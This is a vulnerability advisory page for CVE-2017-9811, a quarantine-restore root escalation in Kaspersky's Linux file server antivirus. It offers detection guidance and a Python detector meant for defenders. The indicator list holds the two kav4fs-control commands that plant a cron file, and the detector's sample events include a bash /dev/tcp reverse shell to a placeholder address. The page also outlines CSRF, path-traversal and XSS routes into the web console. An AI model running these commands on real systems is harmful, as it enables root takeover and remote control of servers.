CVE-2017-9811
published 2017-07-17

Priority: P2 (66) · Severity: critical, CVSS 3.0 base score 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: public proof-of-concept available
EPSS: 10.47% (95.2nd percentile)
The kluser is able to interact with the kav4fs-control binary in Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312). By abusing the quarantine read and write operations, it is possible to elevate the privileges to root.

Affected

1 range

Vendor    | Product                     | Version range | Fixed in
kaspersky | anti-virus_for_linux_server | <= 8.0.3.297  | not listed in the range data; the description names Maintenance Pack 2 Critical Fix 4 (8.0.4.312)

Detection & IOCs (extracted from sources)

Indicators:
  • path: /opt/kaspersky/kav4fs/bin/kav4fs-control
  • path: /etc/cron.d/implant
  • path: /tmp/badcron
  • path: /tmp/reverse.sh
  • path: /tmp/pepperoni
  • command: /opt/kaspersky/kav4fs/bin/kav4fs-control -Q --add-object /tmp/badcron
  • command: /opt/kaspersky/kav4fs/bin/kav4fs-control -Q --restore $QUARANTINE_ID --file /etc/cron.d/implant  ($QUARANTINE_ID stands for the quarantine entry ID used in the PoC)
Detection guidance:
  • Monitor for kav4fs-control being invoked with quarantine flags (-Q --add-object, -Q --restore) by the kluser account, especially when the --restore target (--file) is a privileged path such as /etc/cron.d/. The escalation works because the restore is performed with root privileges to an attacker-chosen destination, so the restore step is the higher-fidelity signal; the add step alone is routine AV behaviour.
  • Watch for new files created under /etc/cron.d/ by non-root processes or by kav4fs-control itself; a cron drop-in written this way is the persistence and root-execution mechanism in the PoC.
  • Detect outbound bash reverse shell connections from the Kaspersky AV process or the kluser context using /dev/tcp to external hosts on non-standard ports.
  • The following items concern the product's web management console and come from the same disclosure; they are the likely route to an initial kluser shell rather than part of the quarantine escalation itself, so correlate them with the kav4fs-control activity above:
    • Alert on POST requests to /cgi-bin/cgictl?action=setTaskSettings containing a 'Command' key in the settings parameter, indicating CSRF-driven RCE via notification action configuration.
    • Detect path traversal attempts against /cgi-bin/cgictl?action=getReportStatus where the reportId parameter contains URL-encoded dot-dot sequences (%2f..%2f) and a null byte (%00).
    • Flag XSS probes against the scriptName parameter of the licenseKeyInfo action on port 9080.

Caveats:
  • The PoC IP address 172.16.76.1 and port 8000 are attacker-controlled lab values from the proof-of-concept and should not be treated as fixed attacker infrastructure; real-world exploitation will use different callback addresses.
  • The wmc_sid cookie value in the PoC request is a session token from the researcher's test environment and is not a stable IOC; focus on the request structure and endpoint rather than the session value.
  • Only Kaspersky Anti-Virus for Linux File Server 8.0.3.297 was explicitly tested; other versions may also be affected but were not confirmed.
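The detection points above, turned into runnable logic over constructed sample events. This is an added example written for this page, not code from the CVE source or from Kaspersky; the event field names (type, user, cmdline, process, path) are assumptions standing in for whatever an EDR or auditd pipeline actually emits, and the callback address in the sample reverse shell is a documentation-range placeholder.

```python
"""Detect kav4fs-control quarantine abuse (CVE-2017-9811) in process and file events.

Added example for this page. The event schema and the sample events below are
constructed; adapt the field names to your telemetry source.
"""
import shlex
from dataclasses import dataclass

KAV_CONTROL = "/opt/kaspersky/kav4fs/bin/kav4fs-control"
# Restore destinations the AV quarantine should never write to.
PRIVILEGED_PREFIXES = ("/etc/", "/root/", "/usr/", "/bin/", "/sbin/", "/lib/", "/var/spool/cron/")
# World-writable staging locations an attacker would quarantine a payload from.
STAGING_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class Finding:
    severity: str
    rule: str
    detail: str


def _flag_value(argv, flag):
    """Return the argv token following `flag`, or None if absent."""
    try:
        return argv[argv.index(flag) + 1]
    except (ValueError, IndexError):
        return None


def inspect_exec(user, cmdline):
    """Inspect one process-execution record; return a list of Findings."""
    argv = shlex.split(cmdline)
    findings = []
    if not argv:
        return findings
    if argv[0] == KAV_CONTROL and "-Q" in argv:
        added = _flag_value(argv, "--add-object")
        if added is not None:
            # Quarantining is normal AV behaviour; staging from /tmp is what stands out.
            sev = "medium" if added.startswith(STAGING_PREFIXES) else "low"
            findings.append(Finding(sev, "kav4fs_quarantine_add", f"{user} quarantined {added}"))
        if "--restore" in argv:
            target = _flag_value(argv, "--file")
            if target is not None and target.startswith(PRIVILEGED_PREFIXES):
                # The root-privileged restore to an attacker-chosen path is the escalation step.
                findings.append(Finding("high", "kav4fs_restore_to_privileged_path",
                                        f"{user} restored a quarantine entry to {target}"))
            elif target is not None:
                findings.append(Finding("low", "kav4fs_restore", f"{user} restored to {target}"))
    # bash reverse shell via /dev/tcp from the AV service account.
    if user == "kluser" and any("/dev/tcp/" in tok for tok in argv):
        findings.append(Finding("high", "kluser_dev_tcp_reverse_shell", f"kluser ran: {cmdline}"))
    return findings


def inspect_file_create(user, process, path):
    """Flag cron drop-ins written by non-root users or by kav4fs-control itself."""
    if path.startswith("/etc/cron.d/") and (user != "root" or process == KAV_CONTROL):
        return [Finding("high", "cron_d_write_suspicious", f"{process} as {user} created {path}")]
    return []


# Constructed sample telemetry mirroring the PoC sequence plus benign noise.
SAMPLE_EVENTS = [
    {"type": "exec", "user": "kluser", "cmdline": f"{KAV_CONTROL} -Q --add-object /tmp/badcron"},
    {"type": "exec", "user": "kluser", "cmdline": f"{KAV_CONTROL} -Q --restore 1 --file /etc/cron.d/implant"},
    {"type": "exec", "user": "kluser", "cmdline": "bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'"},
    {"type": "file_create", "user": "root", "process": KAV_CONTROL, "path": "/etc/cron.d/implant"},
    {"type": "exec", "user": "root", "cmdline": f"{KAV_CONTROL} -Q --restore 7 --file /home/alice/report.doc"},
    {"type": "exec", "user": "root", "cmdline": "ls -la /etc/cron.d"},
]


def run(events):
    """Apply both inspectors to a list of events and collect the findings."""
    out = []
    for ev in events:
        if ev["type"] == "exec":
            out.extend(inspect_exec(ev["user"], ev["cmdline"]))
        elif ev["type"] == "file_create":
            out.extend(inspect_file_create(ev["user"], ev["process"], ev["path"]))
    return out


if __name__ == "__main__":
    for f in run(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.rule}: {f.detail}")
```

On the sample set the three high-severity findings (restore into /etc/cron.d, the cron file creation attributed to kav4fs-control, and the /dev/tcp shell from kluser) are exactly the chain the PoC describes; the root-initiated restore to a home directory and the plain `ls` are left at low severity or ignored so the rule stays usable on a busy file server.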

CVSS provenance

Source | Version | Score | Severity | Vector
nvd    | 3.0     | 9.8   | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd    | 2.0     | 10.0  | HIGH     | AV:N/AC:L/Au:N/C:C/I:C/A:C

Note that both NVD vectors rate the issue as network-reachable with no privileges required, while the behaviour described is a local escalation from the kluser service account to root. In the disclosed proof-of-concept the kluser foothold comes first from the web management console weaknesses listed under Detection & IOCs, so the two should be prioritised as one attack path rather than as an unauthenticated remote root on its own.